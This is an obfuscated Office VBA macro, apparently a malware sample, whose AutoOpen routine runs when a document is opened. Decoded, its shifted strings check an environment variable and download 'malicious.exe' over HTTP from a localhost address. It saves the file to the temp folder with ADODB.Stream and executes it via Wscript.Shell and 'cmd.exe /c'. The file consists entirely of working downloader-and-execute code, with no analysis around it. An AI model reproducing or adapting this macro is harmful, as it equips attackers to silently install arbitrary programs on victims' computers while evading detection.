Sub AutoOpen()
	Dim sSUKqv As String
	Dim DbxyNFAJtX As String
	Dim LBkltLiD As String
	Dim TeWsAfXBh As String
	Dim rvwrTTrfKlr As String
	Dim LllpyYtRNPxJUkAnWP As Integer
	Dim NGqqoqhzSqMNJq As Integer
	Dim hqJohzCMSmpMKulQ As Integer

	LllpyYtRNPxJUkAnWP = 21
	NGqqoqhzSqMNJq = 4806
	hqJohzCMSmpMKulQ = 3127
	DbxyNFAJtX = "tdDpuwKrZYWJ"
	sSUKqv = "wLnMiLxlQkAV"
	rvwrTTrfKlr = "Zvfulsw1Vkhoo"
	sSUKqv = rTzgFBylv(sSUKqv, DbxyNFAJtX, LllpyYtRNPxJUkAnWP)
	DbxyNFAJtX = "QAtUKUzGyizfl"
	LBkltLiD = rTzgFBylv(DbxyNFAJtX, sSUKqv, NGqqoqhzSqMNJq)
	If (LBkltLiD = "vrUZjWx") Then
		Dim LuOLmzpF As Object
		TeWsAfXBh = "scRWkL"
		TeWsAfXBh = rTzgFBylv(TeWsAfXBh, rvwrTTrfKlr, hqJohzCMSmpMKulQ)
		Set LuOLmzpF = CreateObject(TeWsAfXBh)
		TeWsAfXBh = lptmepWBoBOj(TeWsAfXBh)
		Dim levykayQYwKFMsIv As String
		levykayQYwKFMsIv = TeWsAfXBh
		TeWsAfXBh = "VbELSLut"
		levykayQYwKFMsIv = rTzgFBylv(TeWsAfXBh, levykayQYwKFMsIv, hqJohzCMSmpMKulQ)
		levykayQYwKFMsIv = FAedvqLMJZpmazg(LuOLmzpF, levykayQYwKFMsIv, LllpyYtRNPxJUkAnWP)
		Set LuOLmzpF = Nothing
	End If
End Sub

Function rTzgFBylv(nihDAaIbfV As String, lYpIRfixPSIXE As String, sgPhveovcWm As Integer) As String
    If (sgPhveovcWm > 1) Then
        rTzgFBylv = Application.Run(nihDAaIbfV, lYpIRfixPSIXE)
    End If
End Function

Function QAtUKUzGyizfl(gOjRwEIE As String) As String
    Dim EFaxCwmtoWadOfPwPo As String
    Dim cKPExmfDsNN As String
    Dim fIqgulBDiO As String
    Dim CEPpaBfmTYxsG As Integer
    CEPpaBfmTYxsG = 25
    cKPExmfDsNN = "KRXmcrFgsDQhMkvdp"
    fIqgulBDiO = "VMRK^IV4"
    cKPExmfDsNN = rTzgFBylv(cKPExmfDsNN, fIqgulBDiO, CEPpaBfmTYxsG)
    EFaxCwmtoWadOfPwPo = cKPExmfDsNN
    If (UCase(gOjRwEIE) = EFaxCwmtoWadOfPwPo) Then
        QAtUKUzGyizfl = "vrUZjWx"
    Else
        QAtUKUzGyizfl = "lNqxwZMtOwFmCe"
    End If
End Function

Function wLnMiLxlQkAV(CYdVZDXUzSS As String) As String
    Dim PWDrpwGqdcOmEywD As String
	Dim GSQhFEmh As String
	Dim qDKeMWQ As Integer
	qDKeMWQ = 08
	GSQhFEmh = "scRWkL"
	GSQhFEmh = rTzgFBylv(GSQhFEmh, "XVHUGRPDLQ", qDKeMWQ)
    PWDrpwGqdcOmEywD = Environ(GSQhFEmh)
	GSQhFEmh = lptmepWBoBOj(GSQhFEmh)
    wLnMiLxlQkAV = PWDrpwGqdcOmEywD
End Function

Function scRWkL(qwCcEZRjfiVcilfsN As String) As String
    Dim apVwMjoer As Long
    Dim YGzYahNdEF As String
	Dim iXJjCdqpgw As Integer
	iXJjCdqpgw = 3
    For apVwMjoer = 1 To Len(qwCcEZRjfiVcilfsN)
        YGzYahNdEF = YGzYahNdEF & Chr(Asc(Mid(qwCcEZRjfiVcilfsN, apVwMjoer, 1)) - iXJjCdqpgw)
    Next apVwMjoer
	DrvijJd = lptmepWBoBOj(YGzYahNdEF)
    scRWkL = YGzYahNdEF
End Function

Function VbELSLut(tJNyOfZHfBtNVUYTb As String) As String
	Dim gEYaMvXGrksxFp As String
	Dim WvlOyYlmpjjHpZgpZ As String
	Dim gbhqduqIzFuDalTDyc As String
	gbhqduqIzFuDalTDyc = "gqh2i|i$3g$"

	gEYaMvXGrksxFp = gbhqduqIzFuDalTDyc
	gEYaMvXGrksxFp = KRXmcrFgsDQhMkvdp(gEYaMvXGrksxFp)
	VbELSLut = gEYaMvXGrksxFp
End Function

Function KRXmcrFgsDQhMkvdp(aRvsDEiO As String) As String
    Dim SUqYjSQp As Long
    Dim vtmnFYWjxlXtU As String
	Dim gWUStk As Integer
	gWUStk = 4
    For SUqYjSQp = 1 To Len(aRvsDEiO)
        vtmnFYWjxlXtU = vtmnFYWjxlXtU & Chr(Asc(Mid(aRvsDEiO, SUqYjSQp, 1)) - gWUStk)
    Next SUqYjSQp
	DrvijJd = lptmepWBoBOj(vtmnFYWjxlXtU)
    KRXmcrFgsDQhMkvdp = vtmnFYWjxlXtU
End Function

Function lptmepWBoBOj(WUcBGYjLffgTHFs As String) As String
	Dim TohpN As Integer
	Dim zSdYxfKpdiJWDBkFbOh As String
	If (UCase(WUcBGYjLffgTHFs) = "hXKptmgKFcl") Then
		TohpN = 4
	Else
		TohpN = 5
	End If
	nzEchOePD = cgMNK(WUcBGYjLffgTHFs, TohpN)
	If (nzEchOePD = "PZdGBfLfk") Then
		lptmepWBoBOj = nzEchOePD
	Else
		lptmepWBoBOj = "fpPsfmrbgGEFab"
	End If
End Function

Function FAedvqLMJZpmazg(csaOXFGj As Object, pXZTO As String, hKvyYzlEbMOXkxUWBo As Integer) As String
	Dim XCULYJGzckmrarGTbsi As String
	Dim Siedfb As Integer
	Siedfb = 1
	XCULYJGzckmrarGTbsi = pXZTO
	pXZTO = RGsjgDoKrVDpFFnVINB(pXZTO)
    If (hKvyYzlEbMOXkxUWBo > Siedfb) Then
		Siedfb = Siedfb - 1
		csaOXFGj.Run XCULYJGzckmrarGTbsi & " " & TXRBGTszvpGwi & "\\" & JKzxlVz, Siedfb, True
	End If
	XCULYJGzckmrarGTbsi = "NkTtyxCJUhVciwO"
	FAedvqLMJZpmazg = XCULYJGzckmrarGTbsi
End Function

Function cgMNK(KkqWKooCH As String, SxtGiwIAUhhQSbxO As Integer) As String
    Dim hXKptmgKFcl As Long
    Dim skgnYwdydUbXhOEBQ As String
    For hXKptmgKFcl = 1 To Len(KkqWKooCH)
        skgnYwdydUbXhOEBQ = skgnYwdydUbXhOEBQ & Chr(Asc(Mid(KkqWKooCH, hXKptmgKFcl, 1)) - SxtGiwIAUhhQSbxO)
    Next hXKptmgKFcl
    cgMNK = skgnYwdydUbXhOEBQ
End Function

Function wElRoozLPmdxfqsy(IoVBoTYdGryL As String) As String
	Dim HmgicsFPWQDebb As String
	HmgicsFPWQDebb = "lxxt>3356;2424253qepmgmsyw2i|i"
	HmgicsFPWQDebb = KRXmcrFgsDQhMkvdp(HmgicsFPWQDebb)
	wElRoozLPmdxfqsy = HmgicsFPWQDebb
End Function

Function RGsjgDoKrVDpFFnVINB(GepLnoj As String) As String
	On Error Resume Next
	Dim TASHoHSvzpqMScvzwBL As Object
	Dim NPJufzPhnvLhIBU As Object
	Dim mcJnhQ As String
	Dim SpwEklAbvFNLCjFHYtv As String
	Dim PFuyYLpqnKJLev As String
	Dim yUtXpaziOrdab As Integer
	yUtXpaziOrdab = 92
	mcJnhQ = "PV[PO51Vhuyhu[POKWWS"
	SpwEklAbvFNLCjFHYtv = "scRWkL"
	mcJnhQ = rTzgFBylv(SpwEklAbvFNLCjFHYtv, mcJnhQ, yUtXpaziOrdab)
	Set TASHoHSvzpqMScvzwBL = CreateObject(mcJnhQ)
	mcJnhQ = "DGRGE1Vwuhdp"
	mcJnhQ = rTzgFBylv(SpwEklAbvFNLCjFHYtv, mcJnhQ, yUtXpaziOrdab)
	Set NPJufzPhnvLhIBU = CreateObject(mcJnhQ)
	mcJnhQ = "UdwiWRUqikYuNNLkHF"
	TASHoHSvzpqMScvzwBL.SetOption 2, 13056 
	TASHoHSvzpqMScvzwBL.Open scRWkL("JHW"), wElRoozLPmdxfqsy(mcJnhQ), False
	mcJnhQ = "blBJWng"
	TASHoHSvzpqMScvzwBL.send
	mcJnhQ = "iAONKqbSXM"
	If (TASHoHSvzpqMScvzwBL.Status = VTNblgWnfkgUB("ryColMtdUAO")) Then
		NPJufzPhnvLhIBU.Open
		NPJufzPhnvLhIBU.Type = 1
		NPJufzPhnvLhIBU.Write TASHoHSvzpqMScvzwBL.responseBody
		mcJnhQ = "ltbxUoyxXRxpwBn"
		PFuyYLpqnKJLev = TXRBGTszvpGwi & "\\" & JKzxlVz
		NPJufzPhnvLhIBU.SaveToFile PFuyYLpqnKJLev, VTNblgWnfkgUB("PuluxNNfyNsEwGZ")
		NPJufzPhnvLhIBU.Close
	End If
	mcJnhQ = "ljULDvoOcBUQpQ"
	RGsjgDoKrVDpFFnVINB = mcJnhQ
End Function


Function VTNblgWnfkgUB(UANMzLnthC As String) As Integer
	Dim iGaTinAWYrfJdBxo As Integer
	iGaTinAWYrfJdBxo = 100
	iGaTinAWYrfJdBxo = iGaTinAWYrfJdBxo * 2
	If (UANMzLnthC = "PuluxNNfyNsEwGZ") Then
		iGaTinAWYrfJdBxo = iGaTinAWYrfJdBxo / 100
	End If
	VTNblgWnfkgUB = iGaTinAWYrfJdBxo
End Function

Function JKzxlVz() As String
	Dim HqQUNTQXiXzJayB As String
	HqQUNTQXiXzJayB = "qepmgmsyw2i|i"
	HqQUNTQXiXzJayB = KRXmcrFgsDQhMkvdp(HqQUNTQXiXzJayB)
	JKzxlVz = HqQUNTQXiXzJayB
End Function 

Function TXRBGTszvpGwi() As String
	Dim UKDBkLtvbz As String
	Dim zpQqmWeaz As Integer
	zpQqmWeaz = 253
	UKDBkLtvbz = "scRWkL"
	UKDBkLtvbz = rTzgFBylv(UKDBkLtvbz, "WHPS", zpQqmWeaz)
    UKDBkLtvbz = Environ(UKDBkLtvbz)
	TXRBGTszvpGwi = UKDBkLtvbz
End Function